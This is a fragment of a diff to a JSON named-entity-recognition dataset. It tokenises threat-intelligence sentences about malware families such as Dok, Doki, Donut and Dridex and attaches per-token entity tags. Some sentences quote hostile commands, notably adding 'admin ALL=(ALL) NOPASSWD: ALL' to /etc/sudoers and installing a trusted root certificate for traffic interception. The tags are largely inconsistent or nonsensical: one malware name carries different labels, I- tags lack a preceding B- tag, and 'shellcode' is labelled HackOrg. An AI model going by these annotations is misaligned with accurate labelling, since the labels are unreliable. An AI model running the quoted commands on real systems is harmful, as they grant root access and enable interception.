"B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Diavol", + "can", + "use", + "the", + "ARP", + "table", + "to", + "find", + "remote", + "hosts", + "to", + "scan." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Diavol", + "can", + "spread", + "throughout", + "a", + "network", + "via", + "SMB", + "prior", + "to", + "encryption." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Diavol", + "will", + "terminate", + "services", + "using", + "the", + "Service", + "Control", + "Manager", + "(SCM)", + "API." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "Diavol", + "has", + "obfuscated", + "its", + "main", + "code", + "routines", + "within", + "bitmap", + "images", + "as", + "part", + "of", + "its", + "anti-analysis", + "techniques." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Diavol", + "can", + "collect", + "the", + "computer", + "name", + "and", + "OS", + "version", + "from", + "the", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Diavol", + "can", + "enumerate", + "victims'", + "local", + "and", + "external", + "IPs", + "when", + "registering", + "with", + "C2." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Diavol", + "can", + "collect", + "the", + "username", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Diavol", + "has", + "used", + "HTTP", + "GET", + "and", + "POST", + "requests", + "for", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dipsind", + "can", + "download", + "remote", + "files." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Dipsind", + "can", + "be", + "configured", + "to", + "only", + "run", + "during", + "normal", + "working", + "hours,", + "which", + "would", + "make", + "its", + "communications", + "harder", + "to", + "distinguish", + "from", + "normal", + "traffic." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dipsind", + "encodes", + "C2", + "traffic", + "with", + "base64." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dipsind", + "encrypts", + "C2", + "data", + "with", + "AES256", + "in", + "ECB", + "mode." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dipsind", + "uses", + "HTTP", + "for", + "C2." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Dipsind", + "can", + "spawn", + "remote", + "shells." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "A", + "Dipsind", + "variant", + "registers", + "as", + "a", + "Winlogon", + "Event", + "Notify", + "DLL", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Disco", + "has", + "achieved", + "initial", + "access", + "and", + "execution", + "through", + "content", + "injection", + "into", + "DNS,", + "HTTP,", + "and", + "SMB", + "replies", + "to", + "targeted", + "hosts", + "that", + "redirect", + "them", + "to", + "download", + "malicious", + "files." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Disco", + "can", + "use", + "SMB", + "to", + "transfer", + "files." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Way", + "O", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Disco", + "can", + "download", + "files", + "to", + "targeted", + "systems", + "via", + "SMB." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Disco", + "has", + "been", + "executed", + "through", + "inducing", + "user", + "interaction", + "with", + "malicious", + ".zip", + "and", + ".msi", + "files." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "Disco", + "can", + "create", + "a", + "scheduled", + "task", + "to", + "run", + "every", + "minute", + "for", + "persistence." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DnsSystem", + "can", + "direct", + "queries", + "to", + "custom", + "DNS", + "servers", + "and", + "return", + "C2", + "commands", + "using", + "TXT", + "records." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DnsSystem", + "can", + "upload", + "files", + "from", + "infected", + "machines", + "after", + "receiving", + "a", + "command", + "with", + "`uploaddd`", + "in", + "the", + "string." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DnsSystem", + "can", + "exfiltrate", + "collected", + "data", + "to", + "its", + "C2", + "server." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DnsSystem", + "can", + "download", + "files", + "to", + "compromised", + "systems", + "after", + "receiving", + "a", + "command", + "with", + "the", + "string", + "`downloaddd`." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DnsSystem", + "has", + "lured", + "victims", + "into", + "opening", + "macro-enabled", + "Word", + "documents", + "for", + "execution." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "DnsSystem", + "can", + "write", + "itself", + "to", + "the", + "Startup", + "folder", + "to", + "gain", + "persistence." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DnsSystem", + "can", + "Base64", + "encode", + "data", + "sent", + "to", + "C2." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DnsSystem", + "can", + "use", + "the", + "Windows", + "user", + "name", + "to", + "create", + "a", + "unique", + "identification", + "for", + "infected", + "users", + "and", + "systems." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DnsSystem", + "can", + "use", + "`cmd.exe`", + "for", + "execution." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "Dok", + "proxies", + "web", + "traffic", + "to", + "potentially", + "monitor", + "and", + "alter", + "victim", + "HTTP(S)", + "traffic." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dok", + "uses", + "AppleScript", + "to", + "create", + "a", + "login", + "item", + "for", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dok", + "exfiltrates", + "logs", + "of", + "its", + "execution", + "stored", + "in", + "the", + "<code>/tmp</code>", + "folder", + "over", + "FTP", + "using", + "the", + "<code>curl</code>", + "command." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dok", + "prompts", + "the", + "user", + "for", + "credentials." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dok", + "installs", + "a", + "root", + "certificate", + "to", + "aid", + "in", + "Adversary-in-the-Middle", + "actions", + "using", + "the", + "command", + "<code>add-trusted-cert", + "-d", + "-r", + "trustRoot", + "-k", + "/Library/Keychains/System.keychain", + "/tmp/filename</code>." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dok", + "installs", + "two", + "LaunchAgents", + "to", + "redirect", + "all", + "network", + "traffic", + "with", + "a", + "randomly", + "generated", + "name", + "for", + "each", + "plist", + "file", + "maintaining", + "the", + "format", + "<code>com.random.name.plist</code>." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dok", + "gives", + "all", + "users", + "execute", + "permissions", + "for", + "the", + "application", + "using", + "the", + "command", + "<code>chmod", + "+x", + "/Users/Shared/AppStore.app</code>." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dok", + "uses", + "AppleScript", + "to", + "install", + "a", + "login", + "Item", + "by", + "sending", + "Apple", + "events", + "to", + "the", + "<code>System", + "Events</code>", + "process." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dok", + "downloads", + "and", + "installs", + "Tor", + "via", + "homebrew." + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dok", + "is", + "packed", + "with", + "an", + "UPX", + "executable", + "packer." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "Dok", + "adds", + "<code>admin", + "ALL=(ALL)", + "NOPASSWD:", + "ALL</code>", + "to", + "the", + "<code>/etc/sudoers</code>", + "file." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Doki", + "has", + "used", + "the", + "embedTLS", + "library", + "for", + "network", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Idus", + "O" + ] + }, + { + "tokens": [ + "Doki", + "has", + "used", + "a", + "script", + "that", + "gathers", + "information", + "from", + "a", + "hardcoded", + "list", + "of", + "IP", + "addresses", + "and", + "uploads", + "to", + "an", + "Ngrok", + "URL." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Doki", + "was", + "run", + "through", + "a", + "deployed", + "container." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Doki", + "has", + "used", + "the", + "DynDNS", + "service", + "and", + "a", + "DGA", + "based", + "on", + "the", + "Dogecoin", + "blockchain", + "to", + "generate", + "C2", + "domains." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Doki’s", + "container", + "was", + "configured", + "to", + "bind", + "the", + "host", + "root", + "directory." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Doki", + "has", + "used", + "Ngrok", + "to", + "establish", + "C2", + "and", + "exfiltrate", + "data." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-Purp" + ] + }, + { + "tokens": [ + "Doki", + "was", + "executed", + "through", + "an", + "open", + "Docker", + "daemon", + "API", + "port." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Doki", + "has", + "resolved", + "the", + "path", + "of", + "a", + "process", + "PID", + "to", + "use", + "as", + "a", + "script", + "argument." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Doki", + "has", + "downloaded", + "scripts", + "from", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Doki", + "has", + "disguised", + "a", + "file", + "as", + "a", + "Linux", + "kernel", + "module." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Doki", + "has", + "searched", + "for", + "the", + "current", + "process’s", + "PID." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Doki", + "has", + "executed", + "shell", + "scripts", + "with", + "/bin/sh." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Doki", + "has", + "communicated", + "with", + "C2", + "over", + "HTTPS." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Doki", + "has", + "used", + "the", + "dogechain.info", + "API", + "to", + "generate", + "a", + "C2", + "address." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "Donut", + "can", + "generate", + "shellcode", + "outputs", + "that", + "execute", + "via", + "Ruby." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "B-HackOrg", + "B-Features", + "O", + "O", + "O", + "B-Tool" + ] + }, + { + "tokens": [ + "Donut", + "can", + "patch", + "Antimalware", + "Scan", + "Interface", + "(AMSI),", + "Windows", + "Lockdown", + "Policy", + "(WLDP),", + "as", + "well", + "as", + "exit-related", + "Native", + "API", + "functions", + "to", + "avoid", + "process", + "termination." + ], + "ner_tags": [ + "O", + "O", + "I-Features", + "B-HackOrg", + "B-HackOrg", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Donut", + "can", + "erase", + "file", + "references", + "to", + "payloads", + "in-memory", + "after", + "being", + "reflectively", + "loaded", + "and", + "executed." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Donut", + "can", + "download", + "and", + "execute", + "previously", + "staged", + "shellcode", + "payloads." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Donut", + "can", + "generate", + "shellcode", + "outputs", + "that", + "execute", + "via", + "JavaScript", + "or", + "JScript." + ], + "ner_tags": [ + "O", + "O", + "I-Features", + "B-HackOrg", + "B-HackOrg", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Donut", + "code", + "modules", + "use", + "various", + "API", + "functions", + "to", + "load", + "and", + "inject", + "code." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O" + ] + }, + { + "tokens": [ + "Donut", + "can", + "generate", + "encrypted,", + "compressed/encoded,", + "or", + "otherwise", + "obfuscated", + "code", + "modules." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Donut", + "can", + "generate", + "shellcode", + "outputs", + "that", + "execute", + "via", + "PowerShell." + ], + "ner_tags": [ + "O", + "O", + "I-Features", + "B-HackOrg", + "B-HackOrg", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Donut", + "includes", + "subprojects", + "that", + "enumerate", + "and", + "identify", + "information", + "about", + "Process", + "Injection", + "candidates." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Donut", + "includes", + "a", + "subproject", + "<code>DonutTest</code>", + "to", + "inject", + "shellcode", + "into", + "a", + "target", + "process." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "B-SamFile", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Donut", + "can", + "generate", + "shellcode", + "outputs", + "that", + "execute", + "via", + "Python." + ], + "ner_tags": [ + "O", + "O", + "I-Features", + "B-HackOrg", + "B-HackOrg", + "O", + "O", + "O", + "B-Tool" + ] + }, + { + "tokens": [ + "Donut", + "can", + "generate", + "code", + "modules", + "that", + "enable", + "in-memory", + "execution", + "of", + "VBScript,", + "JScript,", + "EXE,", + "DLL,", + "and", + "dotNET", + "payloads." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "Donut", + "can", + "generate", + "packed", + "code", + "modules." + ], + "ner_tags": [ + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Donut", + "can", + "generate", + "shellcode", + "outputs", + "that", + "execute", + "via", + "VBScript." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "B-HackOrg", + "B-HackOrg", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Donut", + "can", + "use", + "HTTP", + "to", + "download", + "previously", + "staged", + "shellcode", + "payloads." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DownPaper", + "uses", + "PowerShell", + "for", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "DownPaper", + "searches", + "and", + "reads", + "the", + "value", + "of", + "the", + "Windows", + "Update", + "Registry", + "Run", + "key." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DownPaper", + "uses", + "PowerShell", + "to", + "add", + "a", + "Registry", + "Run", + "key", + "in", + "order", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DownPaper", + "collects", + "the", + "victim", + "host", + "name", + "and", + "serial", + "number,", + "and", + "then", + "sends", + "the", + "information", + "to", + "the", + "C2", + "server." + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DownPaper", + "collects", + "the", + "victim", + "username", + "and", + "sends", + "it", + "to", + "the", + "C2", + "server." + ], + "ner_tags": [ + "B-Way", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DownPaper", + "communicates", + "to", + "its", + "C2", + "server", + "over", + "HTTP." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "DownPaper", + "uses", + "the", + "command", + "line." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Downdelph", + "bypasses", + "UAC", + "to", + "escalate", + "privileges", + "by", + "using", + "a", + "custom", + "“RedirectEXE”", + "shim", + "database." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Downdelph", + "uses", + "search", + "order", + "hijacking", + "of", + "the", + "Windows", + "executable", + "sysprep.exe", + "to", + "escalate", + "privileges." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "After", + "downloading", + "its", + "main", + "config", + "file,", + "Downdelph", + "downloads", + "multiple", + "payloads", + "from", + "C2", + "servers." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Downdelph", + "inserts", + "pseudo-random", + "characters", + "between", + "each", + "original", + "character", + "during", + "encoding", + "of", + "C2", + "network", + "requests,", + "making", + "it", + "difficult", + "to", + "write", + "signatures", + "on", + "them." + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Downdelph", + "uses", + "RC4", + "to", + "encrypt", + "C2", + "responses." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dridex", + "has", + "encrypted", + "traffic", + "with", + "RSA." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Dridex", + "can", + "perform", + "browser", + "attacks", + "via", + "web", + "injects", + "to", + "steal", + "information", + "such", + "as", + "credentials,", + "certificates,", + "and", + "cookies." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "I-OffAct", + "I-OffAct", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "B-Tool" + ] + }, + { + "tokens": [ + "Dridex", + "can", + "abuse", + "legitimate", + "Windows", + "executables", + "to", + "side-load", + "malicious", + "DLL", + "files." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dridex", + "has", + "relied", + "upon", + "users", + "clicking", + "on", + "a", + "malicious", + "attachment", + "delivered", + "through", + "spearphishing." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Dridex", + "can", + "use", + "multiple", + "layers", + "of", + "proxy", + "servers", + "to", + "hide", + "terminal", + "nodes", + "in", + "its", + "infrastructure." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dridex", + "has", + "used", + "the", + "<code>OutputDebugStringW</code>", + "function", + "to", + "avoid", + "malware", + "analysis", + "as", + "part", + "of", + "its", + "anti-debugging", + "technique." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dridex's", + "strings", + "are", + "obfuscated", + "using", + "RC4." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dridex", + "contains", + "a", + "backconnect", + "module", + "for", + "tunneling", + "network", + "traffic", + "through", + "a", + "victim's", + "computer.", + "Infected", + "computers", + "become", + "part", + "of", + "a", + "P2P", + "botnet", + "that", + "can", + "relay", + "C2", + "traffic", + "to", + "other", + "infected", + "peers." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dridex", + "can", + "use", + "`regsvr32.exe`", + "to", + "initiate", + "malicious", + "code." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dridex", + "contains", + "a", + "module", + "for", + "VNC." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Dridex", + "can", + "maintain", + "persistence", + "via", + "the", + "creation", + "of", + "scheduled", + "tasks", + "within", + "system", + "directories", + "such", + "as", + "`windows\\system32\\`,", + "`windows\\syswow64,`", + "`winnt\\system32`,", + "and", + "`winnt\\syswow64`." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "Dridex", + "has", + "collected", + "a", + "list", + "of", + "installed", + "software", + "on", + "the", + "system." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dridex", + "has", + "encrypted", + "traffic", + "with", + "RC4." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dridex", + "has", + "collected", + "the", + "computer", + "name", + "and", + "OS", + "architecture", + "information", + "from", + "the", + "system." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dridex", + "has", + "used", + "POST", + "requests", + "and", + "HTTPS", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DropBook", + "can", + "unarchive", + "data", + "downloaded", + "from", + "the", + "C2", + "to", + "obtain", + "the", + "payload", + "and", + "persistence", + "modules." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DropBook", + "has", + "used", + "legitimate", + "web", + "services", + "to", + "exfiltrate", + "data." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DropBook", + "can", + "collect", + "the", + "names", + "of", + "all", + "files", + "and", + "folders", + "in", + "the", + "Program", + "Files", + "directories." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DropBook", + "can", + "download", + "and", + "execute", + "additional", + "files." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "DropBook", + "is", + "a", + "Python-based", + "backdoor", + "compiled", + "with", + "PyInstaller." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DropBook", + "has", + "checked", + "for", + "the", + "presence", + "of", + "Arabic", + "language", + "in", + "the", + "infected", + "machine's", + "settings." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DropBook", + "has", + "checked", + "for", + "the", + "presence", + "of", + 